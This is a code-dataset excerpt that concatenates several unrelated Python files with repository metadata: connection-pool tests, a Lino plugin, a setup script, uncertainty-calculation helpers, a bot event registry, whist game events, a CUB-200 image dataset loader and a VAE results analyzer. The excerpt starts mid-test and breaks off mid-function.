fairy.released_at -= queued_pool.stale + 1
with queued_pool.acquire() as cxn:
assert stale != id(cxn.fairy.cxn)
def test_overflow(self, queued_pool):
queued = [queued_pool.acquire() for _ in range(queued_pool.max_size)]
with queued_pool.acquire() as cxn:
fairy = cxn.fairy
for cxn in queued:
cxn.release()
assert fairy.cxn.is_closed
def test_timeout(self, empty_queued_pool):
empty_queued_pool.timeout = 2
st = time.time()
with pytest.raises(pika_pool.Timeout):
empty_queued_pool.acquire()
elapsed = time.time() - st
assert elapsed < 2.5
def test_timeout_override(self, empty_queued_pool):
st = time.time()
with pytest.raises(pika_pool.Timeout):
empty_queued_pool.acquire(timeout=1)
elapsed = time.time() - st
assert elapsed < 1.5
| 31.314894 | 79 | 0.649409 | 923 | 7,359 | 5.052004 | 0.28494 | 0.07077 | 0.05104 | 0.037744 | 0.463864 | 0.424834 | 0.395239 | 0.324898 | 0.284581 | 0.250054 | 0 | 0.009991 | 0.238348 | 7,359 | 234 | 80 | 31.448718 | 0.821945 | 0.237261 | 0 | 0.346154 | 0 | 0 | 0.051918 | 0.016057 | 0 | 0 | 0 | 0 | 0.076923 | 1 | 0.134615 | false | 0 | 0.051282 | 0.038462 | 0.25641 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2ed43d6c5005bae2644f44607ee1e0503afb323 | 702 | py | Python | lino_xl/lib/boards/__init__.py | khchine5/xl | b1634937a9ce87af1e948eb712b934b11f221d9d | [
"BSD-2-Clause"
] | 1 | 2018-01-12T14:09:48.000Z | 2018-01-12T14:09:48.000Z | lino_xl/lib/boards/__init__.py | khchine5/xl | b1634937a9ce87af1e948eb712b934b11f221d9d | [
"BSD-2-Clause"
] | 1 | 2019-09-10T05:03:47.000Z | 2019-09-10T05:03:47.000Z | lino_xl/lib/boards/__init__.py | khchine5/xl | b1634937a9ce87af1e948eb712b934b11f221d9d | [
"BSD-2-Clause"
] | null | null | null | # Copyright 2008-2015 Luc Saffre
#
# License: BSD (see file COPYING for details)
"""See :mod:`ml.boards`.
.. autosummary::
:toctree:
models
mixins
"""
from lino.api import ad, _
class Plugin(ad.Plugin):
"See :class:`lino.core.Plugin`."
verbose_name = _("Boards")
def setup_config_menu(config, site, user_type, m):
menu_host = site.plugins.contacts
m = m.add_menu(menu_host.app_label, menu_host.verbose_name)
m.add_action('boards.Boards')
def setup_explorer_menu(config, site, user_type, m):
menu_host = site.plugins.contacts
m = m.add_menu(menu_host.app_label, menu_host.verbose_name)
m.add_action('boards.Members')
| 21.272727 | 67 | 0.665242 | 99 | 702 | 4.484848 | 0.464646 | 0.108108 | 0.063063 | 0.081081 | 0.495496 | 0.495496 | 0.495496 | 0.495496 | 0.495496 | 0.495496 | 0 | 0.014388 | 0.207977 | 702 | 32 | 68 | 21.9375 | 0.784173 | 0.259259 | 0 | 0.333333 | 0 | 0 | 0.116667 | 0.048148 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.083333 | 0 | 0.416667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2ed6bd63b9ba47737b8f3f36b327226fa4cd188 | 1,628 | py | Python | setup.py | cfobel/go-posh | 29e387d823fcd148cf7020afdbe5b26a56293729 | [
"MIT"
] | null | null | null | setup.py | cfobel/go-posh | 29e387d823fcd148cf7020afdbe5b26a56293729 | [
"MIT"
] | null | null | null | setup.py | cfobel/go-posh | 29e387d823fcd148cf7020afdbe5b26a56293729 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# Copyright (c) 2002-2008 ActiveState Software
# Author: Trent Mick (trentm@gmail.com)
"""Quick directory changing (super-cd)
'go' is a simple command line script to simplify jumping between
directories in the shell. You can create shortcut names for commonly
used directories and invoke 'go <shortcut>' to switch to that directory
-- among other little features.
"""
import os
import sys
from distutils.core import setup
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "lib"))
try:
import go
finally:
del sys.path[0]
classifiers = """\
Development Status :: 5 - Production/Stable
Environment :: Console
Intended Audience :: Developers
License :: OSI Approved :: MIT License
Operating System :: OS Independent
Programming Language :: Python :: 2
Topic :: Software Development :: Libraries :: Python Modules
"""
if sys.version_info < (2, 3):
# Distutils before Python 2.3 doesn't accept classifiers.
_setup = setup
def setup(**kwargs):
if kwargs.has_key("classifiers"):
del kwargs["classifiers"]
_setup(**kwargs)
doclines = __doc__.split("\n")
setup(
name="go",
version=go.__version__,
maintainer="Trent Mick",
maintainer_email="trentm@gmail.com",
url="http://code.google.com/p/go-tool/",
license="http://www.opensource.org/licenses/mit-license.php",
platforms=["any"],
py_modules=["go"],
package_dir={"": "lib"},
description=doclines[0],
classifiers=filter(None, classifiers.split("\n")),
long_description="\n".join(doclines[2:]),
)
| 28.068966 | 72 | 0.668919 | 205 | 1,628 | 5.214634 | 0.643902 | 0.016838 | 0.026193 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013783 | 0.197789 | 1,628 | 57 | 73 | 28.561404 | 0.804747 | 0.266585 | 0 | 0 | 0 | 0 | 0.374778 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026316 | false | 0 | 0.105263 | 0 | 0.131579 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2f3bc60879bf6291053573473efb8979f222e3a | 3,672 | py | Python | UforFunction.py | DezhengLee/Labster | 561c522d6d3d0b4b70c667d2f9a1d16e1734affc | [
"Apache-2.0"
] | 1 | 2021-09-27T14:26:20.000Z | 2021-09-27T14:26:20.000Z | UforFunction.py | DezhengLee/Labster | 561c522d6d3d0b4b70c667d2f9a1d16e1734affc | [
"Apache-2.0"
] | null | null | null | UforFunction.py | DezhengLee/Labster | 561c522d6d3d0b4b70c667d2f9a1d16e1734affc | [
"Apache-2.0"
] | null | null | null | from sympy import *
from sympy.abc import *
import functions as func
from decimal import *
def findAbsFuncU(function, U, variable, means, roundornot=True):
"""
This function is used to find the absolut compound U, as well as the values of U of temp variables
:param function: (String) the formula
:param U: (Decimal dic, keys: variable) ceiled
:param variable: (char list) [x,y,z,...]
:param means: (Decimal dic, keys: variable)
:return: (Decimal)
"""
resultListSquared = []
values = []
for k in variable:
values.append(float(means[str(k)]))
for k in variable:
tempfunc = lambdify(variable, diff(function, k), 'numpy')
tempvalue = tempfunc(*values)
resultListSquared.append((tempvalue**2) * float(U[str(k)]**2))
sumResult = Decimal(sum(resultListSquared))
result = sumResult.sqrt()
if roundornot:
resultString = result.to_eng_string()
intPart = resultString.split('.')[0]
try: # may not have '.'
decimalPart = resultString.split('.')[1]
digiteff = 0
if intPart == '0':
while decimalPart[digiteff] == '0':
digiteff += 1
digiteff += 2
else:
digiteff = -len(intPart) + 2 # may not true
except IndexError:
digiteff = -len(intPart) + 2 # may not true
return result.quantize(func.rounddigits(digiteff), ROUND_HALF_EVEN)
else:
return result
def findRelaFuncU(function, U, variable, means, roundornot=True):
"""
:param function: (String) the formula
:param U: (Decimal dic, keys: variable) ceiled
:param variable: (char list) [x,y,z,...]
:param means: (Decimal dic, keys: variable)
:return: (Decimal)
"""
lnfunction = 'ln(' + function + ')'
result = findAbsFuncU(lnfunction, U, variable, means, roundornot=roundornot)
return result
def findCompMean(function, variable, means):
"""
This function is used to find the final compound mean, as well as the value of temp variables
:param function:(string)
:param variable:(list/set)
:param means: (Dic)
:return:
"""
values = [] # in float
for k in variable:
values.append(float(means[str(k)]))
tempfunc = lambdify(variable, function, 'numpy')
result = Decimal(tempfunc(*values))
efflist = []
for k in variable:
eff = func.eff(means[str(k)])
efflist.append(eff)
smallest = min(efflist)
dig = smallest
intPart = result.to_eng_string().split('.')[0]
DecimalPart = result.to_eng_string().split('.')[1]
if len(intPart) == 1 and intPart[0] == '0':
i = 0
while DecimalPart[i] == '0':
i += 1
dig += 1
else:
dig = dig - len(intPart)
return result.quantize(func.rounddigits(dig + 1), ROUND_HALF_EVEN)
def findAbsFuncUFromRelaU(CompMean, ru):
"""
:param CompMean:
:param ru:
:return:
"""
result = CompMean * ru
resultString = result.to_eng_string()
intPart = resultString.split('.')[0]
try: # may not have '.'
decimalPart = resultString.split('.')[1]
digiteff = 0
if intPart == '0':
while decimalPart[digiteff] == '0':
digiteff += 1
digiteff += 2
else:
digiteff = -len(intPart) + 2
except IndexError:
digiteff = -len(intPart) + 2 # may not true
return result.quantize(func.rounddigits(digiteff), ROUND_HALF_EVEN)
| 31.384615 | 103 | 0.572168 | 407 | 3,672 | 5.127764 | 0.243243 | 0.028749 | 0.026833 | 0.042166 | 0.561572 | 0.523718 | 0.46574 | 0.435074 | 0.435074 | 0.435074 | 0 | 0.011751 | 0.304739 | 3,672 | 116 | 104 | 31.655172 | 0.805719 | 0.209967 | 0 | 0.540541 | 0 | 0 | 0.009782 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054054 | false | 0 | 0.054054 | 0 | 0.175676 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2f6de5e5cb0ff1bac4f2a109787e36e831a69bb | 3,946 | py | Python | tombot/registry.py | TijmenW/tom-bot | e9368a41562496761a111c28697384730f43db0e | [
"MIT"
] | 1 | 2020-02-02T21:41:01.000Z | 2020-02-02T21:41:01.000Z | tombot/registry.py | TijmenW/tom-bot | e9368a41562496761a111c28697384730f43db0e | [
"MIT"
] | 1 | 2021-05-17T13:14:30.000Z | 2021-05-17T13:14:30.000Z | tombot/registry.py | TijmenW/tom-bot | e9368a41562496761a111c28697384730f43db0e | [
"MIT"
] | 2 | 2020-02-19T17:20:46.000Z | 2020-07-29T18:51:10.000Z | '''
Contains generalized events and the command handlers.
'''
#pylint: disable=too-few-public-methods
import logging
import types
from collections import defaultdict
# Events
# Event constants:
# Format: NAME = 'identifier' # when, (args)
BOT_START = 'tombot.bot.start' # bot's start, (bot)
BOT_SHUTDOWN = 'tombot.bot.shutdown' # bot shutdown, (bot)
BOT_MSG_RECEIVE = 'tombot.layer.msg_receive' # message received, (bot, message)
BOT_CONNECTED = 'tombot.bot.connected' # connection established, (bot)
BOT_DISCONNECTED = 'tombot.bot.disconnected' # connection lost, (bot)
EVENT_HANDLERS = defaultdict(set)
class Subscribe(object):
'''
Subscribes the decorated function to an event. Function is not modified.
'''
def __init__(self, eventname):
self.eventname = eventname
def __call__(self, func):
if hasattr(self.eventname, '__iter__'):
if isinstance(self.eventname, types.StringTypes):
# String
EVENT_HANDLERS[self.eventname].add(func)
return func
# Iterable
for name in self.eventname:
EVENT_HANDLERS[name].add(func)
return func
# Something else
EVENT_HANDLERS[self.eventname].add(func)
return func
def fire_event(eventname, *args, **kwargs):
'''
Call all subscribed functions with the given arguments.
Functions which throw exceptions are unregistered.
'''
for func in EVENT_HANDLERS[eventname]:
try:
func(*args, **kwargs)
except Exception as ex: #pylint: disable=broad-except
LOGGER.critical('Event callback %s failed on event %s, disabled:', func, eventname)
LOGGER.critical(ex)
EVENT_HANDLERS[eventname].remove(func)
# Commands and RPC commands
class RegisteringDecorator(object):
'''
Generalized decorator for registering case-insensitive commands in a dict.
Must be overridden to specify target.
'''
target_dict = {}
def __init__(self, name):
self.name = name
def __call__(self, func):
if hasattr(self.name, '__iter__'):
for item in self.name:
self.target_dict[item.upper()] = func
else:
self.target_dict[self.name.upper()] = func
LOGGER.debug('Registered %s', self.name)
return func
COMMAND_DICT = {}
COMMAND_CATEGORIES = defaultdict(list)
RPC_DICT = {}
class RPCCommand(RegisteringDecorator):
''' Registers all functions that are available via the RPC socket. '''
target_dict = RPC_DICT
class Command(RegisteringDecorator):
''' Registers all functions that are available as a command, and in a help_function '''
target_dict = COMMAND_DICT
help_dict = COMMAND_CATEGORIES
def __init__(self, name, category=None, hidden=False):
self.hidden = hidden
self.category = category
super(Command, self).__init__(name)
def __call__(self, func):
if isinstance(self.name, types.StringTypes):
self.help_dict[self.category].append((self.name, None, func))
else:
self.help_dict[self.category].append((self.name[0], self.name[1:], func))
return super(Command, self).__call__(func)
def safe_call(target_dict, key, *args, **kwargs):
''' Wrapper to call a function and not crash if it excepts. '''
try:
return target_dict[key.upper()](*args, **kwargs)
except (NameError, TypeError):
raise
except Exception as ex: #pylint: disable=broad-except
del target_dict[key]
LOGGER.critical('Command %s disabled: %s', key, ex)
# Helper functions
def get_easy_logger(name, level=None):
''' Create a logger with the given name and optionally a level. '''
result = logging.getLogger(name)
if level:
result.setLevel(level)
return result
LOGGER = get_easy_logger('registry')
| 32.081301 | 95 | 0.650025 | 467 | 3,946 | 5.327623 | 0.327623 | 0.03537 | 0.013264 | 0.018087 | 0.178055 | 0.178055 | 0.168006 | 0.099678 | 0 | 0 | 0 | 0.000672 | 0.245565 | 3,946 | 122 | 96 | 32.344262 | 0.835069 | 0.246072 | 0 | 0.202703 | 0 | 0 | 0.072721 | 0.016354 | 0 | 0 | 0 | 0 | 0 | 1 | 0.121622 | false | 0 | 0.040541 | 0 | 0.364865 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2f78778d85f1d18a46b7ce5d657b1b24b664e70 | 638 | py | Python | whist/game_events.py | PeterSR/pywhist | b66e92974c374d92fb34d28ed20e5af6940175b0 | [
"MIT"
] | null | null | null | whist/game_events.py | PeterSR/pywhist | b66e92974c374d92fb34d28ed20e5af6940175b0 | [
"MIT"
] | null | null | null | whist/game_events.py | PeterSR/pywhist | b66e92974c374d92fb34d28ed20e5af6940175b0 | [
"MIT"
] | null | null | null | from dataclasses import dataclass
from .cards import Trick
from .player import Player
from .partners import TeamID
from .game_actions import BaseAction
class BaseEvent:
pass
@dataclass(frozen=True)
class ActionTakenEvent(BaseEvent):
player: Player
action: BaseAction
def __str__(self):
return f"Player {self.player.name}: {self.action}"
@dataclass(frozen=True)
class TrickTakenEvent(BaseEvent):
player: Player
team_id: TeamID
trick: Trick
def __str__(self):
trick_symbols = tuple(card.symbol for card in self.trick)
return f"Player {self.player.name} took {trick_symbols}"
| 20.580645 | 65 | 0.722571 | 80 | 638 | 5.6125 | 0.4375 | 0.066815 | 0.084633 | 0.106904 | 0.120267 | 0.120267 | 0 | 0 | 0 | 0 | 0 | 0 | 0.194357 | 638 | 30 | 66 | 21.266667 | 0.873541 | 0 | 0 | 0.285714 | 0 | 0 | 0.134796 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0.047619 | 0.238095 | 0.047619 | 0.809524 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2fbe936b6cb25bafa6c922903345c6baab44779 | 8,800 | py | Python | pynet/datasets/cub.py | Duplums/pynet | 5f91dc2e80c2eb4e44d57403dd65aa80e8a5875b | [
"CECILL-B"
] | null | null | null | pynet/datasets/cub.py | Duplums/pynet | 5f91dc2e80c2eb4e44d57403dd65aa80e8a5875b | [
"CECILL-B"
] | null | null | null | pynet/datasets/cub.py | Duplums/pynet | 5f91dc2e80c2eb4e44d57403dd65aa80e8a5875b | [
"CECILL-B"
] | null | null | null | import os
import torch
import logging
from PIL import Image
from itertools import compress
from torch.utils.data import DataLoader, RandomSampler, SequentialSampler
import torchvision.transforms as transforms
from torchvision.datasets import ImageFolder
from pynet.datasets.core import AbstractDataManager, DataItem, SetItem
import pandas as pd
import numpy as np
class CUBDataset(ImageFolder):
"""
cf. Catherine Wah et al, The caltech-ucsd birds-200-2011 dataset, 2011
200 bird categories with 11788 images.
This dataset contains 312 additional binary attributes considered as meta-data.
It can be used as "labels" in a self-supervised setting (only for training).
The training/test split follows the official one.
"""
def __init__(self, root, transform=None, target_transform=None, split="train",
bitransform=False, labels="birds", **kwargs):
"""
:param root: str, path to images folder
:param transform: callable, img transformation
:param target_transform: callable
:param split: str, either "train" or "test"
:param bitransform: bool, if True, returns 2 transformed versions same img
:param labels: either "birds" or "attributes"
:param kwargs: given to super()
"""
assert split in ["train", "test"], "Unknown split: %s"%split
assert labels in ["birds", "attributes"], "Unknown labels: %s"%labels
if split == "test" and labels == "attributes":
raise NotImplementedError()
self.bitransform = bitransform
self.labels = labels
# Returns the birds attributes as labels
if labels == "attributes":
attr_path = os.path.join(os.path.dirname(root), "meta_data_bin_train.csv")
if not os.path.exists(attr_path):
raise FileNotFoundError("Attributes not found in %s"%attr_path)
self.attr = pd.read_csv(attr_path, sep=",")
# Defines training/test split from the official one
train_test_split_pth = os.path.join(os.path.dirname(root), "train_test_split.txt")
img_pth = os.path.join(os.path.dirname(root), "images.txt")
if not os.path.exists(train_test_split_pth) or not os.path.exists(img_pth):
raise FileNotFoundError("Missing %s or %s in CUB dataset"%(train_test_split_pth, img_pth))
# "0" == test, "1" == train
train_test_split = pd.read_csv(train_test_split_pth, sep=" ", names=["id", "split"])
img_pth = pd.read_csv(img_pth, sep=" ", names=["id", "path"])
pth_split = pd.merge(train_test_split, img_pth, on="id", how="inner")
this_split = list(pth_split[pth_split.split.eq(split=="train")].path)
# Checks images repo and find all img paths
super().__init__(root, transform, target_transform, **kwargs)
filter = np.array(["/".join(pth.split("/")[-2:]) in this_split for (pth, _) in self.samples], dtype=np.bool)
assert filter.sum() == len(this_split), "Corrupted CUB data-set: " \
"images missing or corrupted train_test_split.txt"
self.samples = list(compress(self.samples, filter))
self.imgs = self.samples
if self.labels == "attributes":
# generate N X M matrix where N == len(train) and M == # attributes
imgs_df = pd.DataFrame(self.imgs, columns=["path", "class"])
imgs_df.loc[:, "path"] = imgs_df.path.apply(lambda p: "/".join(p.split("/")[-2:]))
self.attr = pd.merge(imgs_df, self.attr, on=["path"], how="left", sort=False)
attr_cols = [i for i in self.attr.columns if 'attr_val' in i]
self.attr = self.attr[attr_cols].to_numpy(dtype=np.float32)
assert len(self.attr) == len(self)
if split == "train":
assert len(self) == 5994
else:
assert len(self) == 5794
def __getitem__(self, index):
(sample, target) = super().__getitem__(index)
if self.labels == "attributes":
target = self.attr[index]
if self.bitransform:
(sample_1, _) = super().__getitem__(index)
sample = torch.stack((sample, sample_1), dim=0)
return sample, target
return sample, target
class CUBDataManager(AbstractDataManager):
"""
NOTE: the train/test transformations follow the ones defined by
Tsai et al., Conditional Contrastive Learning with Kernel, ICLR 2022
"""
def __init__(self, root:str, bitransform:bool=False, labels:str="birds", number_of_folds:int=1,
sampler: str="random", batch_size: int=1, **dataloader_kwargs):
"""
:param root: path to image dir
:param bitransform: bool, if True, returns 2 tf versions of same img with agressive train tf.
Otherwise, use same train tf as test tf.
:param labels: either "birds" or "attributes"
:param number_of_folds: ignored (only one split train/test), just for compatibility reason
:param dataloader_kwargs: given to DataLoader()
"""
assert sampler in ["random", "sequential"], "Unknown sampler '%s'"%sampler
mean_std = ((0.4863, 0.4999, 0.4312), (0.2070, 0.2018, 0.2428))
self.batch_size = batch_size
self.sampler = sampler
self.logger = logging.getLogger("pynet")
def ColorDistortion(s=1.0):
# s is the strength of color distortion.
color_jitter = transforms.ColorJitter(0.8 * s, 0.8 * s, 0.8 * s, 0.2 * s)
rnd_color_jitter = transforms.RandomApply([color_jitter], p=0.8)
rnd_gray = transforms.RandomGrayscale(p=0.2)
color_distort = transforms.Compose([rnd_color_jitter, rnd_gray])
return color_distort
train_transforms = transforms.Compose([
transforms.RandomResizedCrop(224, interpolation=Image.BICUBIC),
transforms.RandomHorizontalFlip(),
ColorDistortion(s=0.5),
transforms.ToTensor(),
transforms.Normalize(*mean_std),
])
test_transforms = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(*mean_std),
])
if not bitransform:
train_transforms = test_transforms
self.dataset = {
"train": [CUBDataset(root, bitransform=bitransform, split="train", labels=labels,
transform=train_transforms)],
"test": CUBDataset(root, split="test", labels="birds", transform=test_transforms)
}
self.dataloader_kwargs = dataloader_kwargs
@staticmethod
def collate_fn(list_samples):
""" After fetching a list of samples using the indices from sampler,
the function passed as the collate_fn argument is used to collate lists
of samples into batches.
A custom collate_fn is used here to apply the transformations.
See https://pytorch.org/docs/stable/data.html#dataloader-collate-fn.
"""
data = dict(outputs=None) # compliant with DataManager <collate_fn>
elem = list_samples[0]
data["inputs"] = torch.stack([sample[0] for sample in list_samples], dim=0).float()
if isinstance(elem[1], np.ndarray):
data["labels"] = torch.stack([torch.from_numpy(sample[1]) for sample in list_samples], dim=0).squeeze().float()
elif isinstance(elem[1], float) or isinstance(elem[1], int):
data["labels"] = torch.tensor([sample[1] for sample in list_samples]).float()
return DataItem(**data)
def get_dataloader(self, train=False, validation=False, test=False, fold_index=0, **kwargs):
train_, test_ = None, None
if train:
if self.sampler == "random":
sampler = RandomSampler(self.dataset["train"][fold_index])
else:
sampler = SequentialSampler(self.dataset["train"][fold_index])
self.logger.warning("Sequential Sampler for training set.")
train_ = DataLoader(self.dataset['train'][fold_index],
batch_size=self.batch_size, sampler=sampler,
collate_fn=CUBDataManager.collate_fn,
**self.dataloader_kwargs)
if test:
test_ = DataLoader(self.dataset['test'],
batch_size=self.batch_size,
collate_fn=CUBDataManager.collate_fn,
**self.dataloader_kwargs)
return SetItem(train=train_, test=test_)
def get_nb_folds(self):
return 1 | 47.826087 | 123 | 0.617727 | 1,064 | 8,800 | 4.973684 | 0.265977 | 0.022109 | 0.021164 | 0.01285 | 0.12774 | 0.098828 | 0.0822 | 0.03099 | 0 | 0 | 0 | 0.017601 | 0.270455 | 8,800 | 184 | 124 | 47.826087 | 0.806698 | 0.197955 | 0 | 0.129032 | 0 | 0 | 0.075847 | 0.003387 | 0 | 0 | 0 | 0 | 0.056452 | 1 | 0.056452 | false | 0 | 0.08871 | 0.008065 | 0.209677 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2fd80e0dd958c8f4932541c7c796d5fba2375bb | 24,569 | py | Python | smp_manifold_learning/scripts/vae_analysis.py | gsutanto/smp_manifold_learning | 60ef8278942c784c8d3bcd0a09031475f80d96fb | [
"MIT"
] | 11 | 2020-09-26T12:13:01.000Z | 2022-03-23T07:34:14.000Z | smp_manifold_learning/scripts/vae_analysis.py | gsutanto/smp_manifold_learning | 60ef8278942c784c8d3bcd0a09031475f80d96fb | [
"MIT"
] | 1 | 2021-04-10T10:42:28.000Z | 2021-04-16T07:04:26.000Z | smp_manifold_learning/scripts/vae_analysis.py | gsutanto/smp_manifold_learning | 60ef8278942c784c8d3bcd0a09031475f80d96fb | [
"MIT"
] | 5 | 2020-09-24T18:52:46.000Z | 2022-03-23T07:26:15.000Z | #!/usr/bin/env python3
import numpy as np
import os
import dill
import json
import pandas as pd
import torch
import matplotlib.pyplot as plt
import plotly.graph_objects as go
from smp_manifold_learning.motion_planner.feature import SphereFeature, LoopFeature
from smp_manifold_learning.differentiable_models.utils import create_dir_if_not_exist
class RenameUnpickler(dill.Unpickler):
def find_class(self, module, name):
renamed_module = module
if module == "vae":
renamed_module = "smp_manifold_learning.differentiable_models.vae"
if module == "nn":
renamed_module = "smp_manifold_learning.differentiable_models.nn"
return super(RenameUnpickler, self).find_class(renamed_module, name)
def renamed_load(file_obj):
return RenameUnpickler(file_obj).load()
class ResultsAnalyzer:
def __init__(self, folder, name=None):
# this is meant to analyze the results of tests run using the smallab
# package. the folder given should be the topmost folder
# (experiment_runs is the default name), holding all the experiments.
self.folder = folder
if name is not None:
self.name = name
else:
# this is the name of the first experiment that was given to the
# Runner
self.name = os.listdir(self.folder)[0]
self.logs_folder = '/'.join([self.folder, self.name, 'logs'])
self.experiments_folder = '/'.join(
[self.folder, self.name, 'experiments'])
self.runs = None
self.specs = None
self.spec_variables = None
self.results_variables = None
def get_single_run(self, name):
# name is the hash of the experiment, given by smallab
# a run is a dict with two entries: "result" and "specification", each
# of which is a dictionary
filename = '/'.join([self.experiments_folder, name, 'run.pkl'])
with open(filename, 'rb') as f:
#run = dill.load(f)
run = renamed_load(f)
return run
def get_all_runs(self):
# only creates the runs dict if it has not previously been created
if self.runs is not None:
return self.runs
self.runs = {}
for d in os.listdir(self.experiments_folder):
# d is the hash of each experiment
self.runs[d] = self.get_single_run(d)
self.spec_variables = self.runs[d]["specification"].keys()
self.results_variables = self.runs[d]["result"].keys()
return self.runs
def get_single_specification(self, name):
# returns spec as a dictionary
# name is the hash of the experiment, given by smallab
filename = '/'.join(
[self.experiments_folder, name, 'specification.json'])
with open(filename, 'rb') as f:
spec = json.load(f)
return spec
def get_all_specifications(self):
# only creates the specs dict if it has not already been created
if self.specs is not None:
return self.specs
self.specs = {}
for d in os.listdir(self.experiments_folder):
# d is the hash of each experiment
self.specs[d] = self.get_single_specification(d)
return self.specs
def get_results_for_parameter(self, parameter_name, results_vars=None):
# answers q: "how does varying [param] affect the results?" returns
# average results for each value of param
if results_vars is None:
results_vars = self.results_variables
param_results = dict()
for experiment, run in self.runs.items():
specs = run["specification"]
result = run["result"]
param_value = specs[parameter_name]
# lists can't be keys of a dictionary
if isinstance(param_value, list):
param_value = tuple(param_value)
if param_value in param_results:
for res in results_vars:
param_results[param_value][res].append(result[res])
else:
param_results[param_value] = dict()
for res in results_vars:
param_results[param_value][res] = [result[res]]
# once all experiments have been added to param_results, we find avgs
param_results_avg = dict()
for val, d in param_results.items():
# val is one of the values that parameter takes on
# results is a dict of lists: results["loss"] = [l1, l2, l3, ...]
# but values inside the lists could be floats, tensors, arrays, etc
param_results_avg[val] = dict()
for metric, results in d.items():
if isinstance(results[0], float) or isinstance(
results[0], int) or isinstance(results[0], np.number):
r_avg = np.mean(results)
elif isinstance(results[0], np.ndarray) or isinstance(
results[0], list) or isinstance(results[0], tuple):
r_avg = np.mean(np.vstack([l for l in results]), axis=0)
elif type(results[0]) == torch.Tensor:
r_avg = np.mean([i.item() for i in results], axis=0)
else:
t = type(results[0])
print(
f"WARNING: Can't take mean of results of type {t}; ignoring"
)
continue
param_results_avg[val][metric] = r_avg
return param_results_avg
def barplot_for_parameter(self,
parameter_name,
plot_metrics=None,
ignore_metrics=None,
subplots=False):
"""
plot_metrics is a list of metrics (strings) that should be plotted. it
should be a subset of avail_metrics (the actual metrics that were
computed for the experiments). This function will ignore any metrics in
plot_metrics that are not in avail_metrics.
"""
if plot_metrics is None:
plot_metrics = self.results_variables
if ignore_metrics is None:
ignore_metrics = []
# param_results[value][metric] = average value, which can be an array or
# a number
param_results = self.get_results_for_parameter(parameter_name)
xs = sorted([k for k in param_results.keys()])
avail_metrics = [k for k in param_results[xs[0]].keys()
] # "re", "kld", etc...
# use the metrics as the different bars in the plot
d = dict()
for x in xs:
for m in avail_metrics:
if m not in plot_metrics or m in ignore_metrics:
continue
if m not in d:
d[m] = []
d[m].append(param_results[x][m])
df = pd.DataFrame(d, index=xs)
# time to plot
ax = df.plot.bar(rot=0, subplots=subplots)
if not subplots:
for p in ax.patches:
ax.annotate(np.round(p.get_height(), decimals=2),
(p.get_x() + p.get_width() / 2., p.get_height()),
ha='center',
va='center',
xytext=(0, 10),
textcoords='offset points')
ax.set_xlabel(parameter_name)
ax.set_ylabel("Metrics")
ax.set_title(
f"Average metrics for all models vs. {parameter_name}: {self.name}"
)
else:
# ax is actually a list of axis objects
a = [_ for _ in ax]
for ax in a:
for p in ax.patches:
ax.annotate(
np.round(p.get_height(), decimals=2),
(p.get_x() + p.get_width() / 2., p.get_height()),
ha='center',
va='center',
xytext=(0, 10),
textcoords='offset points')
ax.set_xlabel(parameter_name)
ax.set_ylabel("Metric value")
ax.set_title(
f"Average metric for all models vs. {parameter_name}: {self.name}"
)
plt.show
return ax
def load_data_from_folder_if_from_dataset(folder, dataset):
return [
np.load(folder + f) for f in os.listdir(folder)
if f.split('/')[-1].split('_')[0] == dataset
]
def plot_ly(dataset_name,
training_data,
recon_folder,
sample_folder,
model_idx_to_plot=2,
plot_4d=False,
plot_slice=False):
# model_idx_to_plot is arbitrarily set to 2, can be set to any index within
# the range of n_trials set during the experiment runs.
# if plot_slice and plot_4d are both True, plot_slice is ignored.
opac = 0.5
recon = load_data_from_folder_if_from_dataset(recon_folder, dataset_name)
